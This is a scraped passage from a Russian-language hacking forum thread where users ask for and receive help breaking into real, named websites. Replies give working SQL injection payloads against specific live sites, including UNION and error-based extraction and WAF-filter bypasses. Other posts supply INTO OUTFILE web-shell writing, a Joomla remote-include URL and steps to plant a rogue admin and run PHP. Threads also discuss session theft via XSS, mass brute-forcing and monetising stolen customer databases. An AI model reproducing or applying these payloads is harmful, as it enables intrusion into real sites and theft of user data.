Not Found The requested URL /admin/password_forgotten.php POST admin_email='UNION+SELECT+0,0,'',0 was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
.
После апробации второго варианта воздействия а-ля
+INTO+OUTFILE+%27shell.php%27+FROM+force_table_err or%2F*&submit=resend
мне сабжем было сказано:
Not Found The requested URL/+INTO+OUTFILE+'shell.php'+FROM+force_table_error/*&submit=resend was not found on this server. Additionally, a 404 Not Found error w as encountered while trying to use an Error Document to handle the request.
. Я подумал, что мб ошибся и дал ему всё одной строкой, на что получил
Not Found The requested URL /admin/password_forgotten.php POST admin_email='UNION+S ELECT+0,0,'',0 +INTO+OUTFILE+'shell.php'+FROM+for ce_table_err or/*&submit=resend was not found on this server. Additionally, a 404 Not Found error w as encountered while trying to use an Error Document to handle the request.
. В общем, я "интуитивно догадываюсь" (с), что нужно по уму лезть в линь, и собирать "пальцы" оси и тд, но согласитесь это не имеет смысла, учитывая что не умеешь эксплуатировать уязвимость. Я в состоянии запустить nmap или любой другой сканер, и собрать эту информацию, но без адвайза это делу не поможет, согласитесь. Я всё же больше по выпечке, хоть и хочется расти над собой.
Так как я не любитель получать всё "искаропки" и не школоло, которому вечно нужна кнопка взлома интернета прошу указания\совета\какие данные мне нужно собрать о сабже, чтобы двигаться дальше, либо какими утилитами эксплуатировать сабж. Имею свой домен, возможность поставить шелл есть. Подписался не столько за деньги, сколько за опыт, чего и вам желаю. Набившего оскомину "заранее спасибо" писать не буду, но буду благодарен за любое указание верного направления, т.к. помощь требуется в основном в том, какова последовательность шагов и утилит, назовем это так.
Подскажите, как подключиться к базе данных сайта, зная ее имя, логин и пароль пользователя? Шелла на сайте нет, соответственно по localhost - не получается. Судя по хостингу - используется DirectAdmin. Не пойму, какой порт писать для подключения к Mysql.
Exploit
у меня вопрос что дальше делать?(хочу использовать експлоит)
Microsoft Windows [Version 6.1.7601]
(c) Корпорац?я Майкрософт (Microsoft Corporation), 2009. Ус? права захищено.
C:\Users\User>php -v
PHP 5.2.17 (cli) (built: Jan 6 2011 17:28:41)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies
C:\Users\User>php C:\Users\User\Desktop\11263.php
################################################## #######################
# LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)
# Date: 27.08.2009
################################################## #######################
usage: php C:\Users\User\Desktop\11263.php host path file [port] [debug]
example: php C:\Users\User\Desktop\11263.php localhost /j1512 ../../../../../../
../../wamp/www/j1512/images/stories/duck.jpg 80 1
C:\Users\User>
Хочу использовать например вот етот експлоит -http://www.exploit-db.com/exploits/11263/-для сайта www.сайт.it.( что для этого надо?)експлоит на пхп интерпретатор пхп скачал запустил через сmd что дальше делать?
где и что вписывать или я что то не так делаю?
и еще сайт на joomla 1.5 может кто подскажет как получить доступ к админке те логин и пароль?( извините за глупый вопрос я новичок)
Подскажите, как подключиться к базе данных сайта, зная ее имя, логин и пароль пользователя? Шелла на сайте нет, соответственно по localhost - не получается. Судя по хостингу - используется DirectAdmin. Не пойму, какой порт писать для подключения к Mysql.
на любом нормальном хостинге доступ к базе данных разрешен только с localhost, а возможность удаленного доступа настраивается отдельно, причем чаще всего разрешение дается на определенную подсеть или ip. порт mysql по умолчанию - 3306.
у меня вопрос что дальше делать?(хочу использовать експлоит)
попробуйте написать какой-нибудь простой скрипт на пхп по любому учебнику. который, например, подключался бы к mysql, и умел читать и записывать туда данные. тогда вопросы что делать со скриптом-эксплоитом отпадут. это самый быстрый способ. ну и вот тут вам показали как использовать скрипт (строка usage) и дали пример (строка example)
C:\Users\User>php C:\Users\User\Desktop\11263.php
usage: php C:\Users\User\Desktop\11263.php host path file [port] [debug]
example: php C:\Users\User\Desktop\11263.php localhost /j1512 ../../../../../../
../../wamp/www/j1512/images/stories/duck.jpg 80
ребят, подскажите,есть ли какие уязвимости в Netcat (CMS) желательно для последних версий, но и старые тоже подойдут
Rastamanka
14.09.2011, 16:17
Подскажите где хранятся пароли от cpanel в том числе рутовый
Severyna
19.09.2011, 02:59
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
exploit:
http://joomla/index.php?mosConfig_absolute_path=http://site.ru/php.txt
Хотя уязвимости джумлы больше зависят от компонентов которые в ней установлены чем от версии.
Попробуй в компонентах баги поищи
http://tosnoshield.ru
http://tosnoshield.ru//index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Можете помочь скуль доделать?
Подскажите как можно вставить сторонний PHP код в джумлу имея ФТП с полными правами + доступ к БД..
пробовал через БД в модули сунуть но отображается просто как текст а не как пхп код...
с инклудами в пхп файлы тоже не получается, ошибки выдает после инклуда, наверное не правильно инклуд делаю хотя тут хз, если можно как то инклудить то подскажите правильный инклуд в файлы.
~{OmRus}~
30.09.2011, 00:22
Как узнавать дижок сайта , и версию?
=strelok=
30.10.2011, 22:36
подскажите какие уязвимости есть в phpmyadmin 3.4.3.1 если можно поподробнее что можно придумать....
=strelok=
30.10.2011, 22:43
Как узнавать дижок сайта , и версию?
/showthread.php?t=141298
/showthread.php?t=231084
Aniweste
21.11.2011, 19:32
Здравствуйте. Нарвался на старую уязвимость в Dle , версии 8.2 . Почитав форум и просмотрев видео не смог понять как именно сформировать LFI. Дошёл только до вывода раскрытия путей:
http://s017.radikal.ru/i440/1111/f4/71c1c2c0023e.jpg
Скажите - можно ли что-нибудь ещё сделать? Либо это предел? Прошу помочь, если не сложно.
Здравствуйте. Нарвался на старую уязвимость в Dle , версии 8.2 . Почитав форум и просмотрев видео не смог понять как именно сформировать LFI. Дошёл только до вывода раскрытия путей:
http://s017.radikal.ru/i440/1111/f4/71c1c2c0023e.jpg
Скажите - можно ли что-нибудь ещё сделать? Либо это предел? Прошу помочь, если не сложно.
Сам по себе вывод путей ничего не даёт, кроме абсолютного пути для возможного шелла.
Drupal
Детали: сайт на drupal 5.6/7, install.php в свободном доступе, имя базы данных и пользователь - известны.
Вопрос: Можно задействовать только брутфорс mysql или же есть другой вариант получить доступ?
Пожалуйста, по существу...
Детали: сайт на drupal 5.6/7, install.php в свободном доступе, имя базы данных и пользователь - известны.
Вопрос: Можно задействовать только брутфорс mysql или же есть другой вариант получить доступ?
Пожалуйста, по существу...
АУУУУ ЕСТЬ КТО ЖИВОЙ?
infoseller
16.12.2011, 14:55
Нашел слепую скулю в cms Nautilus, делать полный дамп - долго, муторно и не нужно. Подскажите, в какой таблице лежат логины и пассы... поиск ничего не дал
dumpers_team
11.01.2012, 06:26
Доброго всем дня, движок стоит interspire shopping cart, каким образом можно определить версию, которая установленна в данный момент?
dumpers_team
13.01.2012, 06:01
Подскажите как можно вставить сторонний PHP код в джумлу имея ФТП с полными правами + доступ к БД..
пробовал через БД в модули сунуть но отображается просто как текст а не как пхп код...
с инклудами в пхп файлы тоже не получается, ошибки выдает после инклуда, наверное не правильно инклуд делаю хотя тут хз, если можно как то инклудить то подскажите правильный инклуд в файлы.
Создай себе админа в бд, зайди в админку, и установи модуль mod_php, он всё выводить должен.
Если будет резать код при сохранении, просто зайди в настройку пользователей, выбери своего пользователя, и отключи редактор.
подскажите в чём дело.. Ситуация такая, сделав запрос такого вида
_http://www.witchcraft.nu/newsitem.php?id=-362+union+select+1,2,table_name,4,5,6,7,8,9,10,11% 20from%20information_schema.tables%20limit%2029,1--
я получаю название таблицы "usedboard", теперь хочу прочитать содержание этой таблицы, делаю запрос такого вида
_http://www.witchcraft.nu/newsitem.php?id=-362+union+select+1,2,column_name,4,5,6,7,8,9,10,11 from information_schema.columns where table_name='usedboard' LIMIT 1,1 --
поидеи как я читал этот запрос должен мне показать содерживое таблицы "usedboard", но вместо этого он мне выкидывает ошибку "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'usedboard\' LIMIT 1,1 --' at line 1"
такая проблема не только с этим пациентам, с десяток разных сайтов перепробовал неполучается прочитать и ошибки не везде одинаковые пишет.
P.S. только начинаю осваивать данное дело, тапками не кидаться
P.S. только начинаю осваивать данное дело, тапками не кидаться
Возможно в другой БД твоя таблица, подбери так:
http://www.witchcraft.nu/newsitem.php?id=-362+and(select+1+from(select+count(*),concat((sele ct+concat(table_schema,0x2e,table_name,0x00)+from+ information_schema.columns+limit+1,1),floor(rand(0 )*2))x+from+information_schema.tables+group+by+x)a )--
Потом from+db.table
Возможно в другой БД твоя таблица, подбери так:
http://www.witchcraft.nu/newsitem.php?id=-362+and(select+1+from(select+count(*),concat((sele ct+concat(table_schema,0x2e,table_name,0x00)+from+ information_schema.columns+limit+1,1),floor(rand(0 )*2))x+from+information_schema.tables+group+by+x)a )--
Потом from+db.table
Ну ты грузанул канеш.. ничего не понял с твоего запроса, я пока что на стадии изучения -5+union+select+1,..., а так мои запросы правельные? я думаю может в них я что то не правильно пишу, спасибо за помощь, а ещё буду благодарен за мануал где используются запросы твоего вида
------------------------
Наугад переберал запросы вида
http://www.witchcraft.nu/newsitem.php?id=-362+union+select+1,2,id,4,5,6,7,8,9,10,11+from+use dboard+limit+1,1--
пытался найти мне нужное поле, попал только на одно существующие "ID", все не правельные выводились ошибкой "Unknown column 'login' in 'field list'", так почему же у меня неполучается прочитать какие поля существуют в usedboard
trololoman96
14.01.2012, 14:32
Ну ты грузанул канеш.. ничего не понял с твоего запроса, я пока что на стадии изучения -5+union+select+1,..., а так мои запросы правельные? я думаю может в них я что то не правильно пишу, спасибо за помощь, а ещё буду благодарен за мануал где используются запросы твоего вида
почти правильный, у тебя там на сайте magic_quotes_gpc = on поэтому нужно избегать ковычки, нужно хексить имя таблицы, т.е. сейчас у тебя так:
... where table_name='usedboard' LIMIT 1,1 --
а нужно
... where table_name=0x75736564626f617264 LIMIT 1,1 --
в мане все есть, тем более ошибка сама намекает на проблему
зы предугадывая ход твоих мыслей, онлайн декодировщик в хекс http://www.string-functions.com/string-hex.aspx
зыы по поводу запроса от Ereee, это error based техника, ман по ней гуглится легко, но лучше начни с основ.
спасибо за помощь, с этим разобрался, бывает такое что в бд нет логина и пароля админа, врятли да? хренова искал походу..
trololoman96 я согласен с вами что в мануале всё есть, но найти это тоже не просто, даже через поиск
прочитал что если команда user() выдаёт значение username@localhost, то получается есть возможность залить шелл локально, нашёл вот такую команду "UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php'; --" как понял к 1.php надо подставить путь который можно узнать в phpinfo на сервере пациента, но что делать с этим куском кода ''?
ещё путает один нюанс, тоже всё с мануалов путает немного, дело в том что все начинают делать запросы по разному вот несколько примеров
-362+union+select+1,...
362+union+select+1,...
362+and(1=2)+union+select+1,...
null+union+select+1,...
так же в конце запроса видел разную концовку ( -- /* ), играет это какую нибудь роль? если да ткните носом в мануал где это расписано для усвоения материала
спасибо за помощь, с этим разобрался, бывает такое что в бд нет логина и пароля админа, врятли да? хренова искал походу..
trololoman96
я согласен с вами что в мануале всё есть, но найти это тоже не просто, даже через поиск
прочитал что если команда user() выдаёт значение username@localhost, то получается есть возможность залить шелл локально, нашёл вот такую команду "UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php'; --" как понял к 1.php надо подставить путь который можно узнать в phpinfo на сервере пациента, но что делать с этим куском кода ''?
ещё путает один нюанс, тоже всё с мануалов путает немного, дело в том что все начинают делать запросы по разному вот несколько примеров
-362+union+select+1,...
362+union+select+1,...
362+and(1=2)+union+select+1,...
null+union+select+1,...
так же в конце запроса видел разную концовку ( -- /* ), играет это какую нибудь роль? если да ткните носом в мануал где это расписано для усвоения материала
/thread43966.html
coka-cola
15.01.2012, 10:58
Ребят подскажите sql иньекции для dle 7.3 дабы она старая думаю вас незатруднит)
ну или фак по взлому мож кто кинут с меня +!
появилась проблема посерьёзнее предыдущий
в общем ситуация такая, есть пациент "avmaniacs.com", нашёл там sql inj, знаю точное кол-во стобцов, определил командой
www.avmaniacs.com/review.php?id=-319+group+by+27-- , если вместо 27 поставить число 28, то появится ошибка "Unknown column '28' in 'group statement'" следовательно стобцов 27
теперь вставляю такой запрос
www.avmaniacs.com/review.php?id=-319+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,27--
поидеи должна отобразится страница где покажутся несколько цифр, но мнесто этого вылазиет страница "Forbidden"
что можно мне сделать??
что можно мне сделать??
http://www.avmaniacs.com/review.php?id=319+or+1+group+by+concat_ws(0x3a,ver sion(),0x00,rand(0)|0)+having+min(0)--+f
Duplicate entry '5.1.56:' for key 'group_key'
http://www.avmaniacs.com/review.php?id=319+and(select+1+from(select+count(* ),/*!concat*/((select+table_name+from+information_schema./**/tables+limit+0,1),floor(rand(0)*2))x+from+informat ion_schema./**/tables+group+by+x)a)--+f
Duplicate entry 'CHARACTER_SETS1' for key 'group_key'
Фильтрует union(но нам это не нужно), concat, information_schema.tables. Обходим:
concat - /*!concat*/
information_schema./**/tables
спасибо за разъяснение, теперь буду знать выходит такая ошибка значит фильтруют что то
из твоего кода снова ничего не понял, но нашёл более простое решение обхода фильтра
"/*!union*/+/*!select*/"
на двух пациентах проканало, больше не встречалось таких
www.avmaniacs.com/review.php?id=-319/*!union*/+/*!select*/user(),version(),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27--
www.ceripp.it/curriculum.php?id=-1/*!union*/+/*!select*/1,user(),3,version(),5,6--
---------------------
хрен там что оказывается
получилось только узнать версию и юзера, начал узнавать table_name как тут же меня обламали с ошибками на несуществующую страницу...
------------
оказывается не всё так плохо как я думал
сделав запрос вот такого вида
www.ceripp.it/curriculum.php?id=-1/*!union*/+/*!select*/1,2,3,/*!table_name*/,5,6+/*!from*/+/*!information_schema.tables*/--
я получил то что хотел
Просто через error-based подбирать кол-во полей не нужно. Но и один минус - выводит только 64 символа(это не проблема, благодаря nikp ).
как через ФТП узнать домен сайта? joomla
как через ФТП узнать домен сайта? joomla
$mosConfig_live_site = 'http://ваш_сайт.ru';
infoseller
20.02.2012, 15:42
http://s018.radikal.ru/i508/1202/cd/2e7f83405c12t.jpg (http://radikal.ru/F/s018.radikal.ru/i508/1202/cd/2e7f83405c12.gif.html)
Не видели подобную цмску и где по дефолту админка?? (нарыл в темпах сайта)
http://s018.radikal.ru/i508/1202/cd/2e7f83405c12t.jpg (http://radikal.ru/F/s018.radikal.ru/i508/1202/cd/2e7f83405c12.gif.html)
Не видели подобную цмску и где по дефолту админка?? (нарыл в темпах сайта)
http://www.activecollab.com/
Stronger
21.02.2012, 21:24
какие есть баги и уязвимости у движка NetSchool
ХАМнаМИЛЛИОН
22.02.2012, 18:27
Такая проблема:
С неизвестного URL действует скрипт, выполняющий запросы к API одного сервиса. Какие запросы выяснить, конечно же, можно. Но можно ли выяснить URL этого скрипта?
//сори, если не туда С:
А где все эти действия вы видите ? там где вы это видети наверное есть логи, можно по ним аринтироватся.
ХАМнаМИЛЛИОН
22.02.2012, 18:39
А где все эти действия вы видите ? там где вы это видети наверное есть логи, можно по ним аринтироватся.
прямо на странице сервиса. Никаких логов нет.
jacklndn
27.02.2012, 17:15
1. Можно ли залить шелл в джyмлy 1.7
Jsky нашел следущее:
Possible secsitive directories - 1125
Directories with EXECUTE permission enabled - 17
Possible sensitive files - 15
Directory backup check - 16
File backup check - 274
2. Есть пассивка на почтовик, но не работает в ie и хроме.
Есть ли варианты обмануть хотя бы ие?
Спрошу еще тут:
Есть доступ к админке сайта. CMS - "МегаГруп Система управления S3". Есть ли возможность туда залить шелл? Кто сталкивался?
drBinokl
30.03.2012, 17:33
скажите пожалуйста какой движок на этом сайте http://nanomix.biz/
Evgentusc
06.04.2012, 13:32
Вопрос такой: как узнать хост на котором находится сайт? вот сам сайт: http://prof-spb.ru
ЗЫ. Если ошибся темой, пожалуйста перенесите в нужную.
mironich
06.04.2012, 13:35
Вопрос такой: как узнать хост на котором находится сайт? вот сам сайт:
http://prof-spb.ru
ЗЫ. Если ошибся темой, пожалуйста перенесите в нужную.
2ip.ru
"Узнать IP адрес сайта", ping prof-spb.ru выдаст ип.
Но это мб не ип конкретно этого сайта, а сервера на котором не только он хоститься.
TambWolf
08.04.2012, 19:01
Дело такое, на одном сайте, если прописывать на одной страницы:
www.sait.ru/stranita/asada (http://www.sait.ru/stranita/asada)
www.sait.ru/stranita/22222 (http://www.sait.ru/stranita/22222)
Вылазеет текст:
{'Connection',"close"},
{'User-Agent',
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0"},
{'Accept',
{'Accept-Language',
"ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3"},
{'Accept-Encoding',"gzip, deflate"},
{'Cookie',
"XXXXXXXXXXXXXXXXXXXXXXXXXX"}],
Сайт стоит на друпале, подскажите пожалуйста, что это за уязвимость и что можно из нее извлечь, в частности как лучше с помощью нее украсть сессию. Можно ли как-нибудь прописать запрос, который бы высылал мне все данные жертвы, ну и соответственно поместить его в ифрайме какого-нибудь html страницы.
Mr.Snuffer
09.04.2012, 17:55
Есть сайт, с postnuke
Спарсил через информашен_чема все таблицы.
Нашел таблу с юзерами, разшифровал пасс вроде как админа.
Но вот в чем но
Где в postnuke админка?
Кроме редактирования пользователя ничего больше найти не могу
Или, если админские логи хранятся не в prefix_users, можно ли их в какой табле найти?
darkness
10.04.2012, 12:17
актуальны ли сейчас xss уязвимости?
Я вот в комментарий вставил javascript код, он отобразился без фильтрации, но не выполнился. Это значит, что такого рода уязвимостей на сайте нет?
актуальны ли сейчас xss уязвимости?
Я вот в комментарий вставил javascript код, он отобразился без фильтрации, но не выполнился. Это значит, что такого рода уязвимостей на сайте нет?
Это значит, наоборот, есть фильтрация, скорее сего htmlspecialchars...
Актуальны как никогда)
Где в postnuke админка?
Сначала авторизуйся на странице user.php, потом ручками перейди на admin.php
darkness
10.04.2012, 12:36
Это значит, наоборот, есть фильтрация, скорее сего htmlspecialchars...
Актуальны как никогда)
Как их в таком случае использовать?
http://www.turkeyhomesales.com/index.php?option=com_estateagent&Itemid=49&act=object&task=showEO&id=1999
есть скуль или нет?, не пойму
http://www.turkeyhomesales.com/index.php?option=com_estateagent&Itemid=49&act=object&task=showEO&id=1999
есть скуль или нет?, не пойму
нету.
Доброго дня и с праздничком всех. Получил доступ к сайту на cms typo3, немогу найти каким образом влезть в шаблон для редактирования... Правка php файлов ничего не дает, там как-то нужно очищать кэш в админке после нововведений. help
antiprisma
26.04.2012, 00:04
Подскажите название трояна с возможностью просматривать локальную сеть win к которой подключен зараженный комп. Ну и ссылку если такой существует в паблике.
Вопрос на зацепку
доброго дня форумчани
вот такой есть прикол
site.com/index.php пашет нормик(отображаеться)
site.com/index.php//////////////////(вагон слешей)
всё рвёт и криво отображаеться можно както раскрутить?
на нулл байт уже все перерыл не пашет
мож кто знает подскажите плиз
А с чего ты взял, что там у тебя инлуд? И какая версия рнр, после обновления 5.3.4 (null байт) уже не работает!
А с чего ты взял, что там у тебя инлуд? И какая версия рнр, после обновления 5.3.4 (null байт) уже не работает!
5.2.11 пхп
но раскрутить никак не могу
promarketing
13.06.2012, 02:00
Word press TimThumb Уязвимость
/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable
Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл
Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
Есть сайт на Drupal, с него недавно были удалены страницы(ранее существовали, теперь 404). Возможно ли создать(воссоздать) страницы с этими определенными именами? Скажем site/node/12345 - движек, я так понял, создает со случайным номером, а нужно именно с определенным!
RuDefc0n
14.06.2012, 02:15
Вопрос - чем удобнее всего рипать сайт?
Нужна некая программа, которая используя веб-шелл пройдется по указанным каталогам и сохранит файлы.
Ибо права на чтение есть, хочу сохранить для анализа на случай закрытия уязвимостей.
zipнуть и скачать не получается - объемы адские и не дает - "Internal Error", даже если по 1 каталогу выбирать. (Использую WSO)
Судя по всему стоит ограничение на время выполнения и ничего тут не сделать.
Плюс из всех команд на запуск доступно только proc_open
Pirotexnik
15.06.2012, 02:04
Подскажите, есть что под vBulletin 3.6.8
Спасибо
boortyhuhtyu
15.06.2012, 02:27
Подскажите, есть что под vBulletin 3.6.8
Спасибо
xss было
Pirotexnik
15.06.2012, 02:57
А можно PoC?)
Esse_rationa
17.06.2012, 23:54
Возникла потребность пробрутить базу сайтов joomla. Так как я новичок в этом, то натолкнулся на такую неприступную, для меня "стену", а опытным деятелям данной сферы это раз плюнуть. Так вот: Нужна база паролей. Желательно проверенная с нормальной "проходимостью"
Заранее превелико благодарен ответившему положительно на мой столь нубский вопрос - просьбу)
HAXTA4OK
18.06.2012, 00:26
Возникла потребность пробрутить базу сайтов joomla. Так как я новичок в этом, то натолкнулся на такую неприступную, для меня "стену", а опытным деятелям данной сферы это раз плюнуть. Так вот: Нужна база паролей. Желательно проверенная с нормальной "проходимостью"
Заранее превелико благодарен ответившему положительно на мой столь нубский вопрос - просьбу)
какой вопрос - такой ответ, может быть ты имелл ввиду базу паролей от joomla а не сайтов? про Базу паролей напиши лучше в соседнем разделе про хеши, возможно там подскажут что лучше....
Esse_rationa
18.06.2012, 00:56
какой вопрос - такой ответ, может быть ты имелл ввиду базу паролей от joomla а не сайтов? про Базу паролей напиши лучше в соседнем разделе про хеши, возможно там подскажут что лучше....
Возможно. Может я ошибаюсь. Повторюсь: "я пока что в изучении."
1. Софт для брута (именно Joomla) есть. Авторский. В паблике старые версии.
2. К нему прилагается небольшая база паролей (обычный .txt) пароли типа "admin, 12345" и т.д
Так вот той базе паролей для подбора, доверия нет (всего 70кб)
Пробиваемость с неё на уровне 1-max3% от общего кол-ва сайтов.
Собственно первоначальная просьба была направить меня в нужное русло поиска, или Лучше дать базу паролей для брута (пробиваемостью хотя бы 40-60%) Был бы очень благодарен!
Сейчас ориентироваться в обиллии разных баз для брута очень сложно. Их много, а я один ) Все проверить я физически не смогу.
HAXTA4OK
18.06.2012, 02:07
Возможно. Может я ошибаюсь. Повторюсь: "я пока что в изучении."
1. Софт для брута (именно Joomla) есть. Авторский. В паблике старые версии.
2. К нему прилагается небольшая база паролей (обычный .txt) пароли типа "admin, 12345" и т.д
Так вот той базе паролей для подбора, доверия нет (всего 70кб)
Пробиваемость с неё на уровне 1-max3% от общего кол-ва сайтов.
Собственно первоначальная просьба была направить меня в нужное русло поиска, или Лучше дать базу паролей для брута (пробиваемостью хотя бы 40-60%) Был бы очень благодарен!
Сейчас ориентироваться в обиллии разных баз для брута очень сложно. Их много, а я один ) Все проверить я физически не смогу.
уже лучше описал...я думаю тебе по счет паролей стоит разделом ниже написать, возможно тебе там подкинут базу которую ты хочешь получить
пробиваемость по бруту ты в процентах не угадаешь , и уж ни как 40-60 процентов не наберешь...я не думаю что админы на столько не идеальны, или же ты такой процент набьешь не за малое кол-во времени
Вопрос такой.
есть доступ к mysql машины, на которой крутится joomla (1.5) . хэш пароля вытащил - но сбрутить не удалось. Какие методы доступа в админку ещё есть? Подмена куков/ещё что-то? Сбросить пароль администратора - крайний и не желательный вариант.
mega_667
19.06.2012, 11:06
Такого рода вопрос, плучил доступ к нескольким сайтам (sql inj->админка->шелл), в их числе 2 интернет-магазина. Слил на всякий случай базы пользователей. Как я могу ещё использовать это в своих целях ? Что ценного я могу поиметь с этого ? Сайты не вялые, аудитория довольно обширная. Заранее, спасибо.
gerrpiligrim
22.06.2012, 00:03
В dle есть поиск по фотографиям(версия 8
Получил на сайте доступ к адмминке, там была уязвимость blind sql, так же получил доступ к ftp. сайт висит на самописной cms, из возможностей есть залива картинок. заливал картинки с шеллом, но заинклудить не знаю как. если ли возможность как нибудь залить шелл?
Подскажите бруд админки Joomla 1.6
Люди добрые, помогите! Не могу подобратся к сайту... Joomla 1.6 просканировал, нашел php в корне с таким содержанием:
jos-Error: Представление не найдено [name, type, prefix]: article, php, contentView
JSite -> dispatch() @ /var/www/okean/data/www/domain.ru/index.php:42
JComponentHelper :: renderComponent() @ /var/www/okean/data/www/domain.ru/includes/application.php:198
JComponentHelper :: executeComponent() @ /var/www/okean/data/www/domain.ru/libraries/joomla/application/component/helper.php:357
require_once() @ /var/www/okean/data/www/domain.ru/libraries/joomla/application/component/helper.php:388
JController -> execute() @ /var/www/okean/data/www/domain.ru/components/com_content/content.php:18
ContentController -> display() @ /var/www/okean/data/www/domain.ru/libraries/joomla/application/component/controller.php:754
JController -> display() @ /var/www/okean/data/www/domain.ru/components/com_content/controller.php:77
JController -> getView() @ /var/www/okean/data/www/domain.ru/libraries/joomla/application/component/controller.php:671
JError :: raiseError() @ /var/www/okean/data/www/domain.ru/libraries/joomla/application/component/controller.php:896
JError :: raise() @ /var/www/okean/data/www/domain.ru/libraries/joomla/error/error.php:251
Что мне это даешь? Можите посоветовать?
boortyhuhtyu
02.07.2012, 16:23
Люди добрые, помогите! Не могу подобратся к сайту... Joomla 1.6 просканировал, нашел php в корне с таким содержанием:
Что мне это даешь? Можите посоветовать?
ничё не даёт забей.
RuDefc0n
03.07.2012, 16:40
Наткнулся на сервер с Jive SBS, заполз в админку.
Теперь страшный вопрос - а что сделать то можно? оО
Как я понял усе в нем на яве.
masonman
03.07.2012, 19:12
Есть что нибудь на форум XenForo?
хелп
есть читалка на сайте прав читать логи нету перерыл всё что можно и не зя
тока системных часть показывает и усё ! что можно ещё попробовать ?
есть читалка на сайте прав читать логи нету перерыл всё что можно и не зя
тока системных часть показывает и усё ! что можно ещё попробовать ?
забить
Pirotexnik
27.07.2012, 16:30
Ребят, что за цмска?
http://www.be2.nl/
shumaher
27.08.2012, 18:06
Залил шелл в vBulletin® Version 4.2.0
каким sql запросом добавить нового админа? хэш действующего сломать не осилил
admin2000:43f439f1c587967e473a3df5da989221
Есть админка на phpbb - как слить базу, что то ненайду?
Всем привет, нашел скулю, но очень она странная.
Помогите раскрутить...
Ссылку прямую дать не могу
Но может кто подскажет варианты, я хочу ее раскрутить:
Итак детали : Есть некий сайт, скажем
http://site.com
Где по следующей ссылке акунетикс нашел скулю блинд скл инжекшн.
http://site.com/misc/print_version.php
Уязвимость касается POST параметра
page was set to /rus/search.php'=sleep(2)='
Полные пост данные:
name=blah&page=/rus/search.php'=sleep(2)='
SQLMAP ее не находит.
Реакция сервера:
1) sleep(2) - засыпает на 20 секунд. Чтобы заснул на 1 секунду, приходится ставить sleep(0.1) - почему так непонятно
2) пробовал следующие варианты:
Не засыпаетИли не засыпает на добавочный слип)
page=blah'=sleep(0.2)='
page='=sleep(0.2)='
page=/rus/search.php'=sleep(0.1)= '
page=/rus/search.php'=sleep(0.1)='" AND (BENCHMARK(100000,SHA1(CURRENT_USER)))
page=/rus/search.php'=sleep(0.1)='" UNION SELECT (BENCHMARK(100000,SHA1(CURRENT_USER))) --
page=/rus/search.php'=(BENCHMARK(100000,SHA1(CURRENT_USER))) =1"
page=/rus/search.php'= (BENCHMARK(100000,SHA1(CURRENT_USER)))='
page=/rus/search.php='=SLEEP(0.1)+(BENCHMARK(100000,SHA1(CUR RENT_USER)))='
page=/rus/search.php'=sleep(0.1)=' AND WHERE (BENCHMARK(100000,SHA1(CURRENT_USER)))=1
page=/rus/search.php'=(IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)
to jkchief
Попробуйте так:
page=/rus/search.php'=(if(substring((select(table_name)from( information_schema.tables)where(table_schema!='inf ormation_schema')limit/**/0,1),1,1)='a',1,sleep(0.1)))='
Ребят подскажите, что творится? Проблема началась на одном сайте WP, стоит плагин уведомления об каких либо изменениях файлов на сервере. Стали приходить сообщения Changed:
wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/1786i
Changed:
/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/4d2fi
Changed:
wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/1786i
В общем каждый день и по нескольку раз
Пару жней назад такое же началось и на другом сайте... При просмотре, выдает набор цифр, как понимаю закодированно, пытался раскодировать, но выдает китайские символы... Вот несколько текстов, которые находятся по уведомляемым изменениям:
